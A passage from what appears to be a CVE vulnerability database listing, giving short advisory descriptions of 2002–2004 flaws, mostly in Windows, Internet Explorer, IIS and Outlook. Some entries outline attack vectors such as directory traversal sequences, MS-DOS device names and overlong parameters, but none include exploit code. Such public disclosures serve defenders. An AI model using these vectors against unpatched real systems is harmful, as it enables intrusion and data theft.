packet, which allows remote attackers to execute arbitrary code or cause a denial of service (server crash), which results in an "unchecked buffer" and possibly triggers a buffer overflow, aka the "Name Validation Vulnerability." [CVE-2004-0566] Integer overflow in imgbmp.cxx for Windows 2000 allows remote attackers to execute arbitrary code via a BMP image with a large bfOffBits value. [CVE-2004-0552] Sophos Small Business Suite 1.00 on Windows does not properly handle files whose names contain reserved MS-DOS device names such as (1) LPT1, (2) COM1, (3) AUX, (4) CON, or (5) PRN, which can allow malicious code to bypass detection when it is installed, copied, or executed. [CVE-2004-0484] mshtml.dll in Microsoft Internet Explorer 6.0.2800 allows remote attackers to cause a denial of service (crash) via a table containing a form that crosses multiple td elements, and whose "float: left" class is defined in a link to a CSS stylesheet after the end of the table, which may trigger a null dereference. [CVE-2004-0475] The showHelp function in Internet Explorer 6 on Windows XP Pro allows remote attackers to execute arbitrary local .CHM files via a double backward slash ("\\") before the target CHM file, as demonstrated using an "ms-its" URL to ntshared.chm. NOTE: this bug may overlap CVE-2003-1041. [CVE-2004-0473] Argument injection vulnerability in Opera before 7.50 does not properly filter "-" characters that begin a hostname in a telnet URI, which allows remote attackers to insert options to the resulting command line and overwrite arbitrary files via (1) the "-f" option on Windows XP or (2) the "-n" option on Linux. [CVE-2004-0420] The Windows Shell application in Windows 98, Windows ME, Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code by spoofing the type of a file via a CLSID specifier in the filename, as demonstrated using Internet Explorer 6.0.2800.1106 on Windows XP. [CVE-2004-0380] The MHTML protocol handler in Microsoft Outlook Express 5.5 SP2 through Outlook Express 6 SP1 allows remote attackers to bypass domain restrictions and execute arbitrary code, as demonstrated on Internet Explorer using script in a compiled help (CHM) file that references the InfoTech Storage (ITS) protocol handlers such as (1) ms-its, (2) ms-itss, (3) its, or (4) mk:@MSITStore, aka the "MHTML URL Processing Vulnerability." [CVE-2004-0379] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft SharePoint Portal Server 2001 allow remote attackers to process arbitrary web content and steal cookies via certain server scripts. [CVE-2004-0284] Microsoft Internet Explorer 6.0, Outlook 2002, and Outlook 2003 allow remote attackers to cause a denial of service (CPU consumption), if "Do not save encrypted pages to disk" is disabled, via a web site or HTML e-mail that contains two null characters (%00) after the host name. [CVE-2004-0281] Caucho Technology Resin 2.1.12 allows remote attackers to gain sensitive information and view the contents of the /WEB-INF/ directory via an HTTP request for "WEB-INF..", which is equivalent to "WEB-INF" in Windows. [CVE-2004-0215] Microsoft Outlook Express 5.5 and 6 allows attackers to cause a denial of service (application crash) via a malformed e-mail header. [CVE-2004-0213] Utility Manager in Windows 2000 launches winhlp32.exe while Utility Manager is running with raised privileges, which allows local users to gain system privileges via a "Shatter" style attack that sends a Windows message to cause Utility Manager to launch winhlp32 by directly accessing the context sensitive help and bypassing the GUI, then sending another message to winhlp32 in order to open a user-selected file, a different vulnerability than CVE-2003-0908. [CVE-2004-0212] Stack-based buffer overflow in the Task Scheduler for Windows 2000 and XP, and Internet Explorer 6 on Windows NT 4.0, allows local or remote attackers to execute arbitrary code via a .job file containing long parameters, as demonstrated using Internet Explorer and accessing a .job file on an anonymous share. [CVE-2004-0205] Buffer overflow in Microsoft Internet Information Server (IIS) 4.0 allows local users to execute arbitrary code via the redirect function. [CVE-2004-0204] Directory traversal vulnerability in the web viewers for Business Objects Crystal Reports 9 and 10, and Crystal Enterprise 9 or 10, as used in Visual Studio .NET 2003 and Outlook 2003 with Business Contact Manager, Microsoft Business Solutions CRM 1.2, and other products, allows remote attackers to read and delete arbitrary files via ".." sequences in the dynamicimag argument to crystalimagehandler.aspx. [CVE-2004-0200] Buffer overflow in the JPEG (JPG) parsing engine in the Microsoft Graphic Device Interface Plus (GDI+) component, GDIPlus.dll, allows remote attackers to execute arbitrary code via a JPEG image with a small JPEG COM field length that is normalized to a large integer length before a memory copy operation. [CVE-2004-0197] Buffer overflow in Microsoft Jet Database Engine 4.0 allows remote attackers to execute arbitrary code via a specially-crafted database query. [CVE-2004-0123] Double free vulnerability in the ASN.1 library as used in Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003, allows remote attackers to cause a denial of service and possibly execute arbitrary code. [CVE-2004-0122] Microsoft MSN Messenger 6.0 and 6.1 does not properly handle certain requests, which allows remote attackers to read arbitrary files. [CVE-2004-0121] Argument injection vulnerability in Microsoft Outlook 2002 does not sufficiently filter parameters of mailto: URLs when using them as arguments when calling OUTLOOK.EXE, which allows remote attackers to use script code in the Local Machine zone and execute arbitrary programs. [CVE-2004-0119] The Negotiate Security Software Provider (SSP) interface in Windows 2000, Windows XP, and Windows Server 2003, allows remote attackers to cause a denial of service (crash from null dereference) or execute arbitrary code via a crafted SPNEGO NegTokenInit request during authentication protocol selection. [CVE-2004-0118] The component for the Virtual DOS Machine (VDM) subsystem in Windows NT 4.0 and Windows 2000 does not properly validate system structures, which allows local users to access protected kernel memory and execute arbitrary code. [CVE-2004-0117] Unknown vulnerability in the H.323 protocol implementation in Windows 98, Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code. [CVE-2004-0115] VirtualPC_Services in Microsoft Virtual PC for Mac 6.0 through 6.1 allows local attackers to truncate and overwrite arbitrary files, and execute arbitrary code, via a symlink attack on the VPCServices_Log temporary file. [CVE-2004-0090] Unknown vulnerability in Windows File Sharing for Mac OS X 10.1.5 through 10.3.2 does not "shutdown properly," which has unknown impact and attack vectors. [CVE-2004-0069] Format string vulnerability in HD Soft Windows FTP Server 1.6 and earlier allows remote attackers to execute arbitrary code via format string specifiers in the username, which is processed by the wscanf function. [CVE-2003-1590] Unspecified vulnerability in Sun ONE (aka iPlanet) Web Server 6.0 SP3 through SP5 on Windows allows remote attackers to cause a denial of service (daemon crash) via unknown vectors. [CVE-2003-1589] Unspecified vulnerability in Sun ONE (aka iPlanet) Web Server 4.1 before SP13 and 6.0 before SP6 on Windows allows attackers to cause a denial of service (daemon crash) via unknown vectors. [CVE-2003-1582] Microsoft Internet Information Services (IIS) 6.0, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue. [CVE-2003-1579] Sun ONE (aka iPlanet) Web Server 6 on Windows, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue. [CVE-2003-1569] GoAhead WebServer before 2.1.5 on Windows 95, 98, and ME allows remote attackers to cause a denial of service (daemon crash) via an HTTP request with a (1) con, (2) nul, (3) clock$, or (4) config$ device name in a path component, different vectors than CVE-2001-0385. [CVE-2003-1567] The undocumented TRACK method in Microsoft Internet Information Services (IIS) 5.0 returns the content of the original request in the body of the response, which makes it easier for remote attackers to steal cookies and authentication credentials, or bypass the HttpOnly protection mechanism, by using TRACK to read the contents of the HTTP headers that are returned in the response, a technique that is similar to cross-site tracing (XST) using HTTP TRACE. [CVE-2003-1566] Microsoft Internet Information Services (IIS) 5.0 does not log requests that use the TRACK method, which allows remote attackers to obtain sensitive information without detection. [CVE-2003-1559] Microsoft Internet Explorer 5.22, and other 5 through 6 SP1 versions, sends Referer headers containing https:// URLs in requests for http:// URLs, which allows remote attackers to obtain potentially sensitive information by reading Referer log data. [CVE-2003-1544] Unrestricted critical resource lock in Terminal Services for Windows 2000 before SP4 and Windows XP allows remote authenticated users to cause a denial of service (reboot) by obtaining a read lock on msgina.dll, which prevents msgina.dll from being loaded. [CVE-2003-1524] PGPi PGPDisk 6.0.2i does not unmount a PGP partition when the switch user function in Windows XP is used, which could allow local users to access data on another user's PGP partition. [CVE-2003-1505] Microsoft Internet Explorer 6.0 allows remote attackers to cause a denial of service (crash) by creating a web page or HTML e-mail with a textarea in a div element whose scrollbar-base-color is modified by a CSS style, which is then moved. [CVE-2003-1484] Microsoft Internet Explorer 6.0 SP1 allows remote attackers to cause a denial of service (crash) by creating a DHTML link that uses the AnchorClick "A" object with a blank href attribute. [CVE-2003-1482] The backup configuration file for Microsoft MN-500 wireless base station stores administrative passwords in plaintext, which allows local users to gain access. [CVE-2003-1448] Memory leak in the Windows 2000 kernel allows remote attackers to cause a denial of service (SMB request hang) via a NetBIOS continuation packet. [CVE-2003-1407] Buffer overflow in cmd.exe in Windows NT 4.0 may allow local users to execute arbitrary code via a long pathname argument to the cd command. [CVE-2003-1378] Microsoft Outlook Express 6.0 and Outlook 2000, with the security zone set to Internet Zone, allows remote attackers to execute arbitrary programs via an HTML email with the CODEBASE parameter set to the program, a vulnerability similar to CAN-2002-0077. [CVE-2003-1357] ProxyView has a default administrator password of Administrator for Embedded Windows NT, which allows remote attackers to gain access. [CVE-2003-1328] The showHelp() function in Microsoft Internet Explorer 5.01, 5.5, and 6.0 supports certain types of pluggable protocols that allow remote attackers to bypass the cross-domain security model and execute arbitrary code, aka "Improper Cross Domain Security Validation with ShowHelp functionality." [CVE-2003-1326] Microsoft Internet Explorer 5.5 and 6.0 allows remote attackers to bypass the cross-domain security model to run malicious script or arbitrary programs via dialog boxes, aka "Improper Cross Domain Security Validation with dialog box." [CVE-2003-1306] Microsoft URLScan 2.5, with the RemoveServerHeader option enabled, allows remote attackers to obtain sensitive information (server name and version) via an HTTP request that generates certain errors such as 400 "Bad Request," which leak the Server header in the response. [CVE-2003-1305] Microsoft Internet Explorer allows remote attackers to cause a denial of service (resource consumption) via a Javascript src attribute that recursively loads the current web page. [CVE-2003-1233] Pedestal Software Integrity Protection Driver (IPD) 1.3 and earlier allows privileged attackers, such as rootkits, to bypass file access restrictions to the Windows kernel by using the NtCreateSymbolicLinkObject function to create a symbolic link to (1) \Device\PhysicalMemory or (2) to a drive letter using the subst command. [CVE-2003-1227] PHP remote file include vulnerability in index.php for Gallery 1.4 and 1.4-pl1, when running on Windows or in Configuration mode on Unix, allows remote attackers to inject arbitrary PHP code via a URL in the GALLERY_BASEDIR parameter, a different vulnerability than CVE-2002-1412. NOTE: this issue might be exploitable only during installation, or if the administrator has not run a security script after installation. [CVE-2003-1142] Help in NIPrint LPD-LPR Print Server 4.10 and earlier executes Windows Explorer with SYSTEM privileges, which allows local users to gain privileges. [CVE-2003-1127] Whale Communications e-Gap 2.5 on Windows 2000 allows remote attackers to obtain the source code for the login page via the HTTP TRACE method, which bypasses the preprocessor. [CVE-2003-1126] Unknown vulnerability in SunOne/iPlanet Web Server SP3 through SP5 on Windows platforms allows remote attackers to cause a denial of service. [CVE-2003-1027] Internet Explorer 5.01 through 6 SP1 allows remote attackers to direct drag and drop behaviors and other mouse click actions to other windows by using method caching (SaveRef) to access the window.moveBy method, which is otherwise inaccessible, as demonstrated by HijackClickV2, a different vulnerability than CVE-2003-0823, aka the "Function Pointer Drag and Drop Vulnerability." [CVE-2003-0995] Buffer overflow in the Microsoft Message Queue Manager (MSQM) allows remote attackers to cause a denial of service (RPC service crash) via a queue registration request. [CVE-2003-0910] The NtSetLdtEntries function in the programming interface for the Local Descriptor Table (LDT) in Windows NT 4.0 and Windows 2000 allows local attackers to gain access to kernel memory and execute arbitrary code via an expand-down data segment descriptor descriptor that points to protected memory. [CVE-2003-0909] Windows XP allows local users to execute arbitrary programs by creating a task at an elevated privilege level through the eventtriggers.exe command-line tool or the Task Scheduler service, aka "Windows Management Vulnerability." [CVE-2003-0905] Unknown vulnerability in Windows Media Station Service and Windows Media Monitor Service components of Windows Media Services 4.1 allows remote attackers to cause a denial of service (disallowing new connections) via a certain sequence of TCP/IP packets. [CVE-2003-0904] Microsoft Exchange 2003 and Outlook Web Access (OWA), when configured to use NTLM authentication, does not properly reuse HTTP connections, which can cause OWA users to view mailboxes of other users when Kerberos has been disabled as an authentication method for IIS 6.0, e.g. when SharePoint Services 2.0 is installed. [CVE-2003-0903] Buffer overflow in a component of Microsoft Data Access Components (MDAC) 2.5 through 2.8 allows remote attackers to execute arbitrary code via a malformed UDP response to a broadcast request. [CVE-2003-0897] "Shatter" vulnerability in CommCtl32.dll in Windows XP may allow local users to execute arbitrary code by sending (1) BCM_GETTEXTMARGIN or (2) BCM_SETTEXTMARGIN button control messages to privileged applications. [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled. [CVE-2003-0837] Stack-based buffer overflow in IBM DB2 Universal Data Base 7.2 for Windows, before Fixpak 10a, allows attackers with "Connect" privileges to execute arbitrary code via the INVOKE command. [CVE-2003-0824] Unknown vulnerability in the SmartHTML interpreter (shtml.dll) in Microsoft FrontPage Server Extensions 2000 and 2002, and Microsoft SharePoint Team Services 2002, allows remote attackers to cause a denial of service (response failure) via a certain request. [CVE-2003-0823] Internet Explorer 6 SP1 and earlier allows remote attackers to direct drag and drop behaviors and other mouse click actions to other windows by calling the window.moveBy method, aka HijackClick, a different vulnerability than CVE-2003-1027. [CVE-2003-0822] Buffer overflow in the debug functionality in fp30reg.dll of Microsoft FrontPage Server Extensions (FPSE) 2000 and 2002 allows remote attackers to execute arbitrary code via a crafted chunked encoded request. [CVE-2003-0821] Microsoft Excel 97, 2000, and 2002 allows remote attackers to execute arbitrary code via a spreadsheet with a malicious XLM (Excel 4) macro that bypasses the macro security model. [CVE-2003-0820] Microsoft Word 97, 98(J), 2000, and 2002, and Microsoft Works Suites 2001 through 2004, do not properly check the length of the "Macro names" data value, which could allow remote attackers to execute arbitrary code via a buffer overflow attack. [CVE-2003-0819] Buffer overflow in the H.323 filter of Microsoft Internet Security and Acceleration Server 2000 allows remote attackers to execute arbitrary code in the Microsoft Firewall Service via certain H.323 traffic, as demonstrated by the NISCC/OUSPG PROTOS test suite for the H.225 protocol. [CVE-2003-0813] A multi-threaded race condition in the Windows RPC DCOM functionality with the MS03-039 patch installed allows remote attackers to cause a denial of service (crash or reboot) by causing two threads to process the same RPC request, which causes one thread to use memory after it has been freed, a different vulnerability than CVE-2003-0352 (Blaster/Nachi), CVE-2003-0715, and CVE-2003-0528, and as demonstrated by certain exploits against those vulnerabilities. [CVE-2003-0812] Stack-based buffer overflow in a logging function for Windows Workstation Service (WKSSVC.DLL) allows remote attackers to execute arbitrary code via RPC calls that cause long entries to be written to a debug log file ("NetSetup.LOG"), as demonstrated using the NetAddAlternateComputerName API. [CVE-2003-0768] Microsoft ASP.Net 1.1 allows remote attackers to bypass the Cross-Site Scripting (XSS) and Script Injection protection feature via a null character in the beginning of a tag name. [CVE-2003-0767] Buffer overflow in RogerWilco graphical server 1.4.1.6 and earlier, dedicated server 0.32a and earlier for Windows, and 0.27 and earlier for Linux and BSD, allows remote attackers to cause a denial of service and execute arbitrary code via a client request with a large length value. [CVE-2003-0717] The Messenger Service for Windows NT through Server 2003 does not properly verify the length of the message, which allows remote attackers to execute arbitrary code via a buffer overflow attack. [CVE-2003-0712] Cross-site scripting (XSS) vulnerability in the HTML encoding for the Compose New Message form in Microsoft Exchange Server 5.5 Outlook Web Access (OWA) allows remote attackers to execute arbitrary web script. [CVE-2003-0711] Stack-based buffer overflow in the PCHealth system in the Help and Support Center function in Windows XP and Windows Server 2003 allows remote attackers to execute arbitrary code via a long query in an HCP URL. [CVE-2003-0666] Buffer overflow in Microsoft Wordperfect Converter allows remote attackers to execute arbitrary code via modified data offset and data size parameters in a Corel WordPerfect file. [CVE-2003-0665] Buffer overflow in the ActiveX control for Microsoft Access Snapshot Viewer for Access 97, 2000, and 2002 allows remote attackers to execute arbitrary code via long parameters to the control. [CVE-2003-0664] Microsoft Word 2002, 2000, 97, and 98(J) does not properly check certain properties of a document, which allows attackers to bypass the macro security model and automatically execute arbitrary macros via a malicious document. [CVE-2003-0663] Unknown vulnerability in the Local Security Authority Subsystem Service (LSASS) in Windows 2000 domain controllers allows remote attackers to cause a denial of service via a crafted LDAP message. [CVE-2003-0661] The NetBT Name Service (NBNS) for NetBIOS in Windows NT 4.0, 2000, XP, and Server 2003 may include random memory in a response to a NBNS query, which could allow remote attackers to obtain sensitive information. [CVE-2003-0659] Buffer overflow in a function in User32.dll on Windows NT through Server 2003 allows local users to execute arbitrary code via long (1) LB_DIR messages to ListBox or (2) CB_DIR messages to ComboBox controls in a privileged application. [CVE-2003-0642] WatchGuard ServerLock for Windows 2000 before SL 2.0.4 allows local users to access kernel memory via a symlink attack on \Device\PhysicalMemory. [CVE-2003-0641] WatchGuard ServerLock for Windows 2000 before SL 2.0.3 allows local users to load arbitrary modules via the OpenProcess() function, as demonstrated using (1) a DLL injection attack, (2) ZwSetSystemInformation, and (3) API hooking in OpenProcess. [CVE-2003-0605] The RPC DCOM interface in Windows 2000 SP3 and SP4 allows remote attackers to cause a denial of service (crash), and local attackers to use the DoS to hijack the epmapper pipe to gain privileges, via certain messages to the __RemoteGetClassObject interface that cause a NULL pointer to be passed to the PerformScmStage function. [CVE-2003-0526] Cross-site scripting (XSS) vulnerability in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to inject arbitrary web script via a URL containing the script in the domain name portion, which is not properly cleansed in the default error pages (1) 500.htm for "500 Internal Server error" or (2) 404.htm for "404 Not Found." [CVE-2003-0525] The getCanonicalPath function in Windows NT 4.0 may free memory that it does not own and cause heap corruption, which allows attackers to cause a denial of service (crash) via requests that cause a long file name to be passed to getCanonicalPath, as demonstrated on the IBM JVM using a long string to the java.io.getCanonicalPath Java method. [CVE-2003-0519] Certain versions of Internet Explorer 5 and 6, in certain Windows environments, allow remote attackers to cause a denial of service (freeze) via a URL to C:\aux (MS-DOS device name) and possibly other devices. [CVE-2003-0513] Microsoft Internet Explorer allows remote attackers to bypass intended cookie access restrictions on a web application via "%2e%2e" (encoded dot dot) directory traversal sequences in a URL, which causes Internet Explorer to send the cookie outside the specified URL subsets, e.g. to a vulnerable application that runs on the same server as the target application. [CVE-2003-0507] Stack-based buffer overflow in Active Directory in Windows 2000 before SP4 allows remote attackers to cause a denial of service (reboot) and possibly execute arbitrary code via an LDAP version 3 search request with a large number of (1) "AND," (2) "OR," and possibly other statements, which causes LSASS.EXE to crash. [CVE-2003-0506] Microsoft NetMeeting 3.01 2000 before SP4 allows remote attackers to cause a denial of service (shutdown of NetMeeting conference) via malformed packets, as demonstrated via the chat conversation. [CVE-2003-0505] Directory traversal vulnerability in Microsoft NetMeeting 3.01 2000 before SP4 allows remote attackers to read arbitrary files via "..\.." (dot dot) sequences in a file transfer request. [CVE-2003-0503] Buffer overflow in the ShellExecute API function of SHELL32.DLL in Windows 2000 before SP4 may allow attackers to cause a denial of service or execute arbitrary code via a long third argument. [CVE-2003-0469] Buffer overflow in the HTML Converter (HTML32.cnv) on various Windows operating systems allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via cut-and-paste operation, as demonstrated in Internet Explorer 5.0 using a long "align" argument in an HR tag. [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service. [CVE-2003-0446] Cross-site scripting (XSS) in Internet Explorer 5.5 and 6.0, possibly in a component that is also used by other Microsoft products, allows remote attackers to insert arbitrary web script via an XML file that contains a parse error, which inserts the script in the resulting error message. [CVE-2003-0414] The installation of Sun ONE Application Server 7.0 for Windows 2000/XP creates a statefile with world-readable permissions, which allows local users to gain privileges by reading a plaintext password in the statefile. [CVE-2003-0413] Cross-site scripting (XSS) vulnerability in the webapps-simple sample application for (1) Sun ONE Application Server 7.0 for Windows 2000/XP or (2) Sun Java System Web Server 6.1 allows remote attackers to insert arbitrary web script or HTML via an HTTP request that generates an "Invalid JSP file" error, which inserts the text in the resulting error message. [CVE-2003-0412] Sun ONE Application Server 7.0 for Windows 2000/XP does not log the complete URI of a long HTTP request, which could allow remote attackers to hide malicious activities. [CVE-2003-0411] Sun ONE Application Server 7.0 for Windows 2000/XP allows remote attackers to obtain JSP source code via a request that uses the uppercase ".JSP" extension instead of the lowercase .jsp extension. [CVE-2003-0389] Cross-site scripting (XSS) vulnerability in the secure redirect function of RSA ACE/Agent 5.0 for Windows, and 5.x for Web, allows remote attackers to insert arbitrary web script and possibly cause users to enter a passphrase via a GET request containing the script. [CVE-2003-0353] Buffer overflow in a component of SQL-DMO for Microsoft Data Access Components (MDAC) 2.5 through 2.7 allows remote attackers to execute arbitrary code via a long response to a broadcast request to UDP port 1434. [CVE-2003-0350] The control for listing accessibility options in the Accessibility Utility Manager on Windows 2000 (ListView) does not properly handle Windows messages, which allows local users to execute arbitrary code via a "Shatter" style message to the Utility Manager that references a user-controlled callback function. [CVE-2003-0347] Heap-based buffer overflow in VBE.DLL and VBE6.DLL of Microsoft Visual Basic for Applications (VBA) SDK 5.0 through 6.3 allows remote attackers to execute arbitrary code via a document with a long ID parameter. [CVE-2003-0344] Buffer overflow in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to execute arbitrary code via / (slash) characters in the Type property of an Object tag in a web page. [CVE-2003-0306] Buffer overflow in EXPLORER.EXE on Windows XP allows attackers to execute arbitrary code as the XP user via a desktop.ini file with a long .ShellClassInfo parameter. [CVE-2003-0268] SLWebMail 3 on Windows systems allows remote attackers to identify the full path of the server via invalid requests to DLLs such as WebMailReq.dll, which reveals the path in an error message. [CVE-2003-0267] ShowGodLog.dll in SLWebMail 3 on Windows systems allows remote attackers to read arbitrary files by directly calling ShowGodLog.dll with an argument specifying the full path of the target file. [CVE-2003-0266] Multiple buffer overflows in SLWebMail 3 on Windows systems allows remote attackers to cause a denial of service and possibly execute arbitrary code via (1) a long Language parameter to showlogin.dll, (2) a long CompanyID parameter to recman.dll, (3) a long CompanyID parameter to admin.dll, or (4) a long CompanyID parameter to globallogin.dll. [CVE-2003-0232] Microsoft SQL Server 7, 2000, and MSDE allows local users to execute arbitrary code via a certain request to the Local Procedure Calls (LPC) port that leads to a buffer overflow. [CVE-2003-0231] Microsoft SQL Server 7, 2000, and MSDE allows local or remote authenticated users to cause a denial of service (crash or hang) via a long request to a named pipe. [CVE-2003-0230] Microsoft SQL Server 7, 2000, and MSDE allows local users to gain privileges by hijacking a named pipe during the authentication of another user, aka the "Named Pipe Hijacking" vulnerability. [CVE-2003-0226] Microsoft Internet Information Services (IIS) 5.0 and 5.1 allows remote attackers to cause a denial of service via a long WebDAV request with a (1) PROPFIND or (2) SEARCH method, which generates an error condition that is not properly handled. [CVE-2003-0225] The ASP function Response.AddHeader in Microsoft Internet Information Server (IIS) 4.0 and 5.0 does not limit memory requests when constructing headers, which allow remote attackers to generate a large header to cause a denial of service (memory consumption) with an ASP page. [CVE-2003-0224] Buffer overflow in ssinc.dll for Microsoft Internet Information Services (IIS) 5.0 allows local users to execute arbitrary code via a web page with a Server Side Include (SSI) directive with a long filename, aka "Server Side Include Web Pages Buffer Overrun." [CVE-2003-0223] Cross-site scripting vulnerability (XSS) in the ASP function responsible for redirection in Microsoft Internet Information Server (IIS) 4.0, 5.0, and 5.1 allows remote attackers to embed a URL containing script in a redirection message. [CVE-2003-0172] Buffer overflow in openlog function for PHP 4.3.1 on Windows operating system, and possibly other OSes, allows remote attackers to cause a crash and possibly execute arbitrary code via a long filename argument. [CVE-2003-0168] Buffer overflow in Apple QuickTime Player 5.x and 6.0 for Windows allows remote attackers to execute arbitrary code via a long QuickTime URL. [CVE-2003-0118] SQL injection vulnerability in the Document Tracking and Administration (DTA) website of Microsoft BizTalk Server 2000 and 2002 allows remote attackers to execute operating system commands via a request to (1) rawdocdata.asp or (2) RawCustomSearchField.asp containing an embedded SQL statement. [CVE-2003-0117] Buffer overflow in the HTTP receiver function (BizTalkHTTPReceive.dll ISAPI) of Microsoft BizTalk Server 2002 allows attackers to execute arbitrary code via a certain request to the HTTP receiver. [CVE-2003-0116] Microsoft Internet Explorer 5.01, 5.5 and 6.0 does not properly check the Cascading Style Sheet input parameter for Modal dialogs, which allows remote attackers to read files on the local system via a web page containing script that creates a dialog and then accesses the target files, aka "Modal Dialog script execution." [CVE-2003-0115] Microsoft Internet Explorer 5.01, 5.5 and 6.0 does not properly check parameters that are passed during third party rendering, which could allow remote attackers to execute arbitrary web script, aka the "Third Party Plugin Rendering" vulnerability, a different vulnerability than CVE-2003-0233. [CVE-2003-0114] The file upload control in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to automatically upload files from the local system via a web page containing a script to upload the files. [CVE-2003-0113] Buffer overflow in URLMON.DLL in Microsoft Internet Explorer 5.01, 5.5 and 6.0 allows remote attackers to execute arbitrary code via an HTTP response containing long values in (1) Content-type and (2) Content-encoding fields. [CVE-2003-0112] Buffer overflow in Windows Kernel allows local users to gain privileges by causing certain error messages to be passed to a debugger. [CVE-2003-0110] The Winsock Proxy service in Microsoft Proxy Server 2.0 and the Microsoft Firewall service in Internet Security and Acceleration (ISA) Server 2000 allow remote attackers to cause a denial of service (CPU consumption or packet storm) via a spoofed, malformed packet to UDP port 1745. [CVE-2003-0045] Jakarta Tomcat before 3.3.1a on certain Windows systems may allow remote attackers to cause a denial of service (thread hang and resource consumption) via a request for a JSP page containing an MS-DOS device name, such as aux.jsp. [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served. [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names. [CVE-2003-0011] Unknown vulnerability in the DNS intrusion detection application filter for Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to cause a denial of service (blocked traffic to DNS servers) via a certain type of incoming DNS request that is not properly handled. [CVE-2003-0010] Integer overflow in JsArrayFunctionHeapSort function used by Windows Script Engine for JScript (JScript.dll) on various Windows operating system allows remote attackers to execute arbitrary code via a malicious web page or HTML e-mail that uses a large array index value that enables a heap-based buffer overflow attack. [CVE-2003-0007] Microsoft Outlook 2002 does not properly handle requests to encrypt email messages with V1 Exchange Server Security certificates, which causes Outlook to send the email in plaintext, aka "Flaw in how Outlook 2002 handles V1 Exchange Server Security Certificates could lead to Information Disclosure." [CVE-2003-0002] Cross-site scripting vulnerability (XSS) in ManualLogin.asp script for Microsoft Content Management Server (MCMS) 2001 allows remote attackers to execute arbitrary script via the REASONTXT parameter. [CVE-2002-2435] The Cascading Style Sheets (CSS) implementation in Microsoft Internet Explorer 8.0 and earlier does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document, a related issue to CVE-2010-2264. [CVE-2002-2413] WebSite Pro 3.1.11.0 on Windows allows remote attackers to read script source code for files with extensions greater than 3 characters via a URL request that uses the equivalent 8.3 file name. [CVE-2002-2401] NT Virtual DOS Machine (NTVDM.EXE) in Windows 2000, NT and XP does not verify user execution permissions for 16-bit executable files, which allows local users to bypass the loader and execute arbitrary programs. [CVE-2002-2395] InterScan VirusWall 3.52 for Windows allows remote attackers to bypass virus protection and possibly execute arbitrary code via HTTP 1.1 gzip content encoding. [CVE-2002-2394] InterScan VirusWall 3.6 for Linux and 3.52 for Windows allows remote attackers to bypass virus protection and possibly execute arbitrary code via HTTP 1.1 chunked transfer encoding. [CVE-2002-2380] NetDSL ADSL Modem 800 with Microsoft Network firmware 5.5.11 allows remote attackers to gain access to configuration menus by sniffing undocumented usernames and passwords from network traffic. [CVE-2002-2328] Active Directory in Windows 2000, when supporting Kerberos V authentication and GSSAPI, allows remote attackers to cause a denial of service (hang) via an LDAP client that sets the page length to zero during a large request. [CVE-2002-2324] The "System Restore" directory and subdirectories, and possibly other subdirectories in the "System Volume Information" directory on Windows XP Professional, have insecure access control list (ACL) permissions, which allows local users to access restricted files and modify registry settings. [CVE-2002-2313] Eudora email client 5.1.1, with "use Microsoft viewer" enabled, allows remote attackers to execute arbitrary programs via an HTML email message containing a META refresh tag that references an embedded .mhtml file with ActiveX controls that execute a second embedded program, which is processed by Internet Explorer. [CVE-2002-2311] Microsoft Internet Explorer 6.0 and possibly others allows remote attackers to upload arbitrary file contents when users press a key corresponding to the JavaScript (1) event.ctrlKey or (2) event.shiftKey onkeydown event contained in a webpage. NOTE: it was reported that the vendor has disputed the severity of this issue. [CVE-2002-2275] Fortres 101 4.1 allows local users to bypass Fortres by pressing the Windows and "F" key together for 30 seconds, which opens multiple windows and eventually causes explorer.exe to crash, which then opens an unrestricted explorer.exe. [CVE-2002-2248] Buffer overflow in the sun.awt.windows.WDefaultFontCharset Java class implementation in Netscape 4.0 allows remote attackers to execute arbitrary code via an applet that calls the WDefaultFontCharset constructor with a long string and invokes the canConvert method. [CVE-2002-2224] Buffer overflow in PGPFreeware 7.03 running on Windows NT 4.0 SP6 allows remote attackers to cause a denial of service and possibly execute arbitrary code via crafted Internet Key Exchange (IKE) response packets, possibly including (1) a large Security Parameter Index (SPI) field, (2) large number of payloads, or (3) a long payload. [CVE-2002-2169] Cross-site scripting vulnerability AOL Instant Messenger (AIM) 4.5 and 4.7 for MacOS and Windows allows remote attackers to conduct unauthorized activities, such as adding buddies and groups to a user's buddy list, via a URL with a META HTTP-EQUIV="refresh" tag to an aim: URL. [CVE-2002-2164] Buffer overflow in Microsoft Outlook Express 5.0, 5.5, and 6.0 allows remote attackers to cause a denial of service (crash) via a long <A HREF> link. [CVE-2002-2132] Windows File Protection (WFP) in Windows 2000 and XP does not remove old security catalog .CAT files, which could allow local users to replace new files with vulnerable old files that have valid hash codes. [CVE-2002-2101] Microsoft Outlook 2002 allows remote attackers to execute arbitrary JavaScript code, even when 